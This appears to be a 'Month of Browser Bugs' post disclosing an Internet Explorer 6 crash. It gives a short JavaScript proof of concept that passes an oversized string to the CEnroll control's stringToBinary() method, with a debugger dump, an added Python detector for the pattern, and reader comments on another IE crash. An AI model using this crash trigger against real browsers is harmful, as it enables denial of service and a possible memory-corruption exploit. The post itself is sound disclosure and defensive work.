MoBB #21: CEnroll stringToBinary
The following bug was tested on the latest version of Internet Explorer 6 on a fully-patched Windows XP SP2 system. Calling the stringToBinary() method of the CEnroll control with a long string as the second parameter can result in an invalid memory access inside OLEAUT32!SysAllocStringLen. This bug is similar to MoBB #8.
var a = new ActiveXObject('CEnroll.CEnroll.2');
var b = 'BOOM';
while (b.length <= 1024*1024) b+=b;
a.stringToBinary(1, b);
Demonstration
eax=03580024 ebx=00300000 ecx=0005fc08
edx=00300000 esi=03571000 edi=03701004
eip=77124ba4 esp=0013b200 ebp=0013b20c
OLEAUT32!SysAllocStringLen+0x4f:
77124ba4 f3a5 rep movsd ds:03571000=???????? es:03701004=00000000
This bug will be added to the OSVDB:
Microsoft IE CEnroll SysAllocStringLen Invalid Length
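An added example (not code from the original post): a small Python heuristic that flags HTML or script content matching the shape of this PoC, a CEnroll instantiation plus a stringToBinary() call on a string built by a doubling loop; the regexes and sample documents are constructed for this example.

```python
import re

# Constructed detection heuristics (example code, not from the original post).
# They key on the shape of the PoC: the CEnroll ProgID quoted in the post,
# a stringToBinary() call, and a string-doubling loop that builds a huge argument.
CENROLL_PROGID = re.compile(
    r"""ActiveXObject\s*\(\s*['"]CEnroll\.CEnroll(?:\.\d+)?['"]\s*\)""", re.I)
STRING_TO_BINARY = re.compile(r"\.stringToBinary\s*\(", re.I)
# Matches e.g.  while (b.length <= 1024*1024) b += b;
DOUBLING_LOOP = re.compile(
    r"while\s*\([^)]*\blength\b[^)]*\)\s*(\w+)\s*\+=\s*\1\b", re.I)


def scan_script(text: str) -> list:
    """Return the heuristic tags that fire on one HTML/JS document."""
    tags = []
    if CENROLL_PROGID.search(text):
        tags.append("cenroll-activex")
    if STRING_TO_BINARY.search(text):
        tags.append("stringToBinary-call")
    if DOUBLING_LOOP.search(text):
        tags.append("string-doubling-loop")
    return tags


def is_suspicious(text: str) -> bool:
    """Flag only the combination: CEnroll instantiated AND stringToBinary called
    AND an argument built by a doubling loop. A page that merely loads the
    control (e.g. legitimate certificate enrollment) is not flagged."""
    tags = set(scan_script(text))
    return {"cenroll-activex", "stringToBinary-call", "string-doubling-loop"} <= tags


# Constructed samples: the first mirrors the PoC above, the second is a benign
# page that instantiates the same control without the crash pattern.
SAMPLE_POC = """<script>
var a = new ActiveXObject('CEnroll.CEnroll.2');
var b = 'BOOM';
while (b.length <= 1024*1024) b+=b;
a.stringToBinary(1, b);
</script>"""
SAMPLE_BENIGN = """<script>
var enroll = new ActiveXObject("CEnroll.CEnroll.2");
var req = enroll.createPKCS10(dn, usage);
</script>"""

if __name__ == "__main__":
    for name, doc in (("poc", SAMPLE_POC), ("benign", SAMPLE_BENIGN)):
        print(name, scan_script(doc), is_suspicious(doc))
```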
3 Comments:
Hi hdm.
Some days ago I discovered a bug in IE while experimenting with some workarounds for PNG compatibility.
But it works for every image type (GIF, JPG, BMP etc.) with width=1px and height>505px.
I don't really know why IE crashes, maybe you can take a closer look at it ;)
http://odium.com.ru/crystal/iekill.htm
cYa,
crystal
hi,
you announced 1 (one) bug for Konqueror. will there be more to come?
crystal,
your bug causes a stack overflow (c00000fd), though why I can't say at all. To me, with my lack of knowledge of DrWatson (which I used to get info about the crash), it looks like the exception occurs in the dxtrans function, and since the function you used contains the term "Alpha" I suppose the crash involves image transparency handling.
Hope this is of some interest/use.
~nog_lorp